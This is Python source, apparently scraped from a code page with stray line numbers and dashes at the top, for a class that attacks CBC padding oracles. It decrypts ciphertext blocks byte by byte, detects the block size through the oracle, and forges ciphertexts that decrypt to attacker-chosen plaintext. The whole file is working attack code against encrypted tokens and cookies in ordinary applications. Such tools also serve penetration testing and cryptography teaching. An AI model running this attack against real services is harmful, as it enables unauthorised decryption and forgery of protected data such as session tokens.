123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352 |
- #!/usr/bin/python
- from base64 import b64encode, b64decode
- from copy import deepcopy
- import logging
- import random
- from functools import reduce
- import sys
class Encoding:
    """Enum-like namespace of the supported ciphertext encodings.

    PaddingOracle compares ``self.encoding`` against these plain int values.
    """
    b64 = 1      # standard base64
    b64_web = 2  # URL-safe base64 ('-' / '_'); missing '=' padding tolerated on decode
    hex = 3      # hexadecimal text
    raw = 5      # raw bytes, passed through unchanged


class PaddingOracle(object):
    """Generic code to attack CBC padding oracles.

    The decoded ciphertext is split into ``BS``-byte blocks. Block 0 acts as
    the IV and is never decrypted; block ``i`` (``i >= 1``) is recovered by
    manipulating block ``i - 1``. The attack assumes PKCS#7-style padding
    (``n`` trailing bytes of value ``n``).

    ``oracle`` must be a callable ``oracle(ct) -> bool`` returning True when
    ``ct`` decrypts to correctly padded plaintext and False on a padding
    error. While blocks are cracked it receives a bytearray; during block size
    detection it receives the decoded ciphertext with extra bytes appended.
    """

    def __init__(self, ciphertext, BS=None, verbosity=1, encoding=Encoding.b64, oracle=None):
        """Decode ``ciphertext`` and prepare it for the attack.

        :param ciphertext: ciphertext, encoded as described by ``encoding``
        :param BS: block size in bytes; detected via the oracle when None
        :param verbosity: 0 = warnings only, 1 = info, 2 = debug
        :param encoding: one of the ``Encoding`` values
        :param oracle: padding oracle callable (see class docstring)
        :raises Exception: if BS is None and no oracle is given, or the
            ciphertext length is not a multiple of the block size
        """
        self.set_verbosity(verbosity)
        self.encoding = encoding
        self.oracle_func = oracle
        self.analyse_func = None  # set here but never read by this class
        self.ct = self.decode(ciphertext)  # decoded ciphertext
        self.BS = self.get_blocksize(self.ct) if BS is None else BS
        self.num_blocks = self._ct_init()
        self.blocks = self.split_blocks(self.ct)  # list of bytearray blocks
        self._outmode = "hex"
        # per-block results as {block index: list of ints}, filled by
        # crack_block / decrypt_all_blocks; change_block reuses it_blocks
        self.it_blocks = {}
        self.pt_blocks = {}

    def decode(self, ciphertext):
        """Decode ``ciphertext`` according to ``self.encoding``.

        Internally the ciphertext is processed as raw bytes. ``Encoding.raw``
        (and any unknown encoding) returns the input unchanged.
        """
        import binascii
        from base64 import urlsafe_b64decode

        if self.encoding == Encoding.b64:
            return b64decode(ciphertext)
        if self.encoding == Encoding.hex:
            # binascii works on Python 2 and 3, unlike str.decode('hex')
            return binascii.unhexlify(ciphertext)
        if self.encoding == Encoding.b64_web:
            if isinstance(ciphertext, bytearray):
                ciphertext = bytes(ciphertext)
            # web tokens often strip the trailing '=' padding; restore it
            pad_char = b"=" if isinstance(ciphertext, bytes) else "="
            return urlsafe_b64decode(ciphertext + pad_char * (-len(ciphertext) % 4))
        return ciphertext

    def encode(self, ciphertext):
        """Encode raw ciphertext bytes back into ``self.encoding``.

        The inverse of ``decode``. ``Encoding.raw`` (and any unknown
        encoding) returns the input unchanged.
        """
        import binascii
        from base64 import urlsafe_b64encode

        if self.encoding == Encoding.b64:
            return b64encode(bytes(ciphertext))
        if self.encoding == Encoding.hex:
            return binascii.hexlify(bytes(ciphertext))
        if self.encoding == Encoding.b64_web:
            return urlsafe_b64encode(bytes(ciphertext))
        return ciphertext

    def _ct_init(self):
        """Check that the ciphertext length is a multiple of BS and return the block count.

        :raises Exception: if the length is not a multiple of ``self.BS``
        """
        if len(self.ct) % self.BS != 0:
            raise Exception("[-] Length not a multiple of the BS")
        # integer division: '/' yields a float on Python 3
        return len(self.ct) // self.BS

    def split_blocks(self, ct):
        """Split ``ct`` into a list of ``self.BS``-byte bytearrays."""
        return [bytearray(ct[i:i + self.BS]) for i in range(0, len(ct), self.BS)]

    def merge_blocks(self, blocks):
        """Concatenate ``blocks`` into a single bytearray."""
        out = bytearray()
        for ba in blocks:
            out.extend(ba)
        return out

    def last_word_oracle(self, y):
        """Recover the trailing byte(s) of the intermediate block D(y).

        Implements Vaudenay's "last word oracle". A random block ``r`` is
        prepended to ``y``, and the last byte of ``r`` is varied until the
        oracle accepts ``r || y``. Then the bytes of ``r`` are disturbed from
        the left to find the length ``n`` of the accepted padding.

        :param y: one ciphertext block (``self.BS`` bytes)
        :returns: bytearray with the last ``n >= 1`` bytes of D(y)
        :raises Exception: if no oracle is set or no last byte is accepted
        """
        if self.oracle_func is None:
            raise Exception("[-] No Oracle function set!")
        bs = self.BS
        y = bytearray(y)
        r = bytearray(random.randint(0x00, 0xff) for _ in range(bs))
        r_b = r[-1]
        for i in range(256):
            r[-1] = r_b ^ i
            if self.oracle_func(self.merge_blocks([r, y])):
                break
        else:
            raise Exception("[-] Oracle never reported a valid padding")
        # (r XOR D(y)) now ends in a valid padding of unknown length n.
        # Flip bytes from the left: the first flip that breaks the padding
        # marks its first byte.
        for n in range(bs, 1, -1):
            probe = bytearray(r)
            probe[bs - n] ^= 0x01
            if not self.oracle_func(self.merge_blocks([probe, y])):
                return bytearray(b ^ n for b in r[bs - n:])
        # no earlier byte matters, so the padding is a single 0x01
        return bytearray([r[-1] ^ 0x01])

    def crack_last_block(self, blocks):
        """Recover the last block of ``blocks`` byte by byte via the oracle.

        A private copy of the second-to-last block is manipulated so that the
        decryption of the last block ends in a valid padding. The caller's
        ``blocks`` are not modified.

        :param blocks: sequence of at least two ``self.BS``-byte blocks
        :returns: ``(it_block, pt_block)`` as lists of ints. ``it_block`` is
            the intermediate state D(last block); ``pt_block`` is
            ``it_block`` XOR the original second-to-last block.
        :raises Exception: if no oracle is set, fewer than two blocks are
            given, or no byte value produces a valid padding at some position
        """
        if self.oracle_func is None:
            raise Exception("[-] No Oracle function set!")
        if len(blocks) < 2:
            raise Exception("[-] Need at least two blocks to crack the last one")
        bs = self.BS
        oracle = self.oracle_func
        blocks = [bytearray(b) for b in blocks]  # private copy
        orig_pre_ct = bytearray(blocks[-2])
        pre_ct = blocks[-2]  # second-to-last block - gets modified
        pt_block = [0] * bs  # plaintext block
        it_block = [0] * bs  # intermediate block
        # byte_index counts backwards through the second-to-last block
        for byte_index in range(bs - 1, -1, -1):
            padding = bs - byte_index
            # make the already recovered trailing bytes decrypt to `padding`
            for known_index in range(byte_index + 1, bs):
                pre_ct[known_index] = it_block[known_index] ^ padding
            for guess in range(256):
                pre_ct[byte_index] = guess
                if not oracle(self.merge_blocks(blocks)):
                    continue
                if padding == 1 and byte_index > 0:
                    # The hit may be a longer valid padding (e.g. the original
                    # one when guess equals the original byte). Disturb the
                    # preceding byte: only a genuine 0x01 padding survives it.
                    pre_ct[byte_index - 1] ^= 0xff
                    genuine = oracle(self.merge_blocks(blocks))
                    pre_ct[byte_index - 1] ^= 0xff
                    if not genuine:
                        continue
                it_block[byte_index] = guess ^ padding
                pt_block[byte_index] = it_block[byte_index] ^ orig_pre_ct[byte_index]
                logging.debug("[~] correct padding [{0}] with byte [{1}]\n\t-> it_byte = {0} ^ {1} = {3}\n\t-> pt_byte = it_byte ^ {2} = {4}\n".format(hex(padding),
                              hex(guess), hex(orig_pre_ct[byte_index]), hex(it_block[byte_index]), hex(pt_block[byte_index])))
                logging.debug("[+] Plaintext Block: {}".format(pt_block))
                break
            else:
                raise Exception("[-] No valid padding found for byte %d" % byte_index)
        return it_block, pt_block

    def print_ct_blocks(self):
        """Print the ciphertext as a hexdump, one block per line."""
        print("[~] ciphertext as blockwise hexdump")
        merged = self.merge_blocks(self.blocks)
        print(self.hexdump(self.bytes_to_string(merged), length=self.BS))

    def bytes_to_string(self, inp):
        """Convert an iterable of byte values (ints) to a string, one char per byte."""
        return "".join([chr(p) for p in inp])

    def change_block(self, new_plaintext):
        """Forge a ciphertext that decrypts to ``new_plaintext`` (CBC-R).

        ``new_plaintext`` is aligned with the ciphertext blocks. Its block 0
        lines up with the IV and is ignored. Block ``i`` (``i >= 1``) becomes
        the plaintext of ciphertext block ``i``. The top block
        (``len(new_plaintext) // BS - 1``) keeps its original ciphertext. All
        earlier blocks, including the IV, are rewritten from the top down.
        Ciphertext blocks beyond the new plaintext are kept unchanged.

        :param new_plaintext: bytes, or text (encoded as latin-1), of length
            a multiple of ``self.BS``
        :returns: the forged ciphertext, encoded via ``self.encode``
        :raises Exception: if the length is not a multiple of BS or the
            plaintext has more blocks than the ciphertext
        """
        if not isinstance(new_plaintext, (bytes, bytearray)):
            new_plaintext = new_plaintext.encode('latin-1')
        if len(new_plaintext) % self.BS != 0:
            raise Exception("[-] new plaintext should be a multiple of the blocksize")
        new_blocks = self.split_blocks(new_plaintext)
        num_new_blocks = len(new_blocks)
        local_blocks = deepcopy(self.blocks)
        if num_new_blocks > len(local_blocks):
            raise Exception("[-] Plaintext is too long")
        top = num_new_blocks - 1
        for idx in range(top, 0, -1):
            logging.info("[*] changing index %d" % idx)
            if idx == top and idx in self.it_blocks:
                # the top block is still the original ciphertext, so a
                # previously cracked intermediate can be reused
                it_block = self.it_blocks[idx]
            else:
                it_block = self.get_it_block(idx, local_blocks)
            local_blocks[idx - 1] = bytearray(p ^ i for p, i in zip(new_blocks[idx], it_block))
        return self.encode(self.merge_blocks(local_blocks))

    def get_it_block(self, index, ct_blocks):
        """Return the intermediate block D(ct_blocks[index]) as a list of ints.

        index := {1, .., len-1}
        :raises Exception: for index 0 (the IV block)
        """
        if not index:
            raise Exception("[-] Cannot decrypt the first block")
        it_block, _ = self.crack_last_block(ct_blocks[:index + 1])
        return it_block

    def crack_block(self, index):
        """Crack block ``index`` of the ciphertext, cache and print the result.

        index := {1, .., len-1}
        :raises Exception: for index 0 (the IV block)
        """
        if not index:
            raise Exception("[-] Cannot decrypt the first block")
        it_block, pt_block = self.crack_last_block(self.blocks[:index + 1])
        self.it_blocks[index] = it_block
        self.pt_blocks[index] = pt_block
        logging.info("\n[+] decrypted block [%d]\n" % (index))
        self._output(pt_block)

    def _output(self, pt_block):
        """Print plaintext byte values as chosen by set_output: "hex" or "str".

        Any other mode prints only the header line.
        """
        print("-----[ Plaintext ]-----")
        if self._outmode == "hex":
            print(self.hexdump(self.bytes_to_string(pt_block)))
        elif self._outmode == "str":
            print(self.bytes_to_string(pt_block))

    def set_output(self, mode):
        """Set the plaintext output mode used by _output ("hex" or "str")."""
        self._outmode = mode

    def set_verbosity(self, level):
        """Set the logging verbosity: 0 = WARNING, 1 = INFO, 2 = DEBUG (others -> INFO)."""
        levels = {
            0: logging.WARNING,
            1: logging.INFO,
            2: logging.DEBUG
        }
        log_level = levels.get(level, logging.INFO)
        logging.basicConfig(format='%(message)s', level=log_level)
        # basicConfig does nothing once the root logger has handlers, so set
        # the level explicitly to make later calls take effect
        logging.getLogger().setLevel(log_level)

    def decrypt_block_at_index(self, index):
        """Log and crack the block at ``index`` (see crack_block)."""
        logging.info("[+] Decrypting block at index %d" % index)
        self.crack_block(index)

    def decrypt_all_blocks(self):
        """Crack all blocks except the IV block, cache the results and print the plaintext."""
        num_blocks = len(self.blocks)
        logging.info("[+] Decrypting all %d blocks" % num_blocks)
        for idx in range(num_blocks, 1, -1):
            logging.info("[*] Decrypting block %d" % (idx))
            # crack_last_block works on a copy, so self.blocks stays intact
            it_block, pt_block = self.crack_last_block(self.blocks[:idx])
            self.it_blocks[idx - 1] = it_block
            self.pt_blocks[idx - 1] = pt_block
        # plaintext in block order; empty when there is only the IV block
        pt = [byte for index in range(1, num_blocks) for byte in self.pt_blocks[index]]
        logging.info("\n[+] decrypted all the blocks\n")
        self._output(pt)

    def get_blocksize(self, ciphertext):
        """Determine whether the cipher uses 8- or 16-byte blocks via the oracle.

        Follows 'Practical Padding Oracle Attacks' by T. Duong & J. Rizzo. A
        length of 8 mod 16 implies 8-byte blocks. Otherwise the last 16 bytes
        are appended to the ciphertext.

        With 8-byte blocks these are the last two blocks, so the new final
        block keeps its original predecessor and the padding stays valid.
        This assumes the original ciphertext is validly padded.

        With 16-byte blocks the last block is chained to itself, which most
        likely breaks the padding.

        :raises Exception: if no oracle is set
        """
        if self.oracle_func is None:
            raise Exception('Error: No oracle set!')
        if len(ciphertext) % 16 == 8:
            return 8
        c = ciphertext[-16:]
        if self.oracle_func(ciphertext + c):
            return 8
        return 16

    def hexdump(self, src, length=16):
        """Return a hexdump of ``src`` with ``length`` characters per line.

        Based on https://gist.github.com/sbz/1080258. bytes/bytearray input
        is rendered byte by byte; anything else goes through ``str()``.
        """
        if isinstance(src, (bytes, bytearray)) and not isinstance(src, str):
            # Python 3 bytes: str() would dump the "b'...'" repr, not the data
            src = self.bytes_to_string(bytearray(src))
        else:
            src = str(src)
        # chars whose repr is just 'c' are shown as-is, everything else as '.'
        printable_map = ''.join(chr(x) if len(repr(chr(x))) == 3 else '.' for x in range(256))
        lines = []
        for offset in range(0, len(src), length):
            chunk = src[offset:offset + length]
            hex_part = ' '.join(["%02x" % ord(ch) for ch in chunk])
            printable = ''.join([printable_map[ord(ch)] if ord(ch) <= 127 else '.' for ch in chunk])
            lines.append("%04x %-*s %s\n" % (offset, length * 3, hex_part, printable))
        return ''.join(lines)
|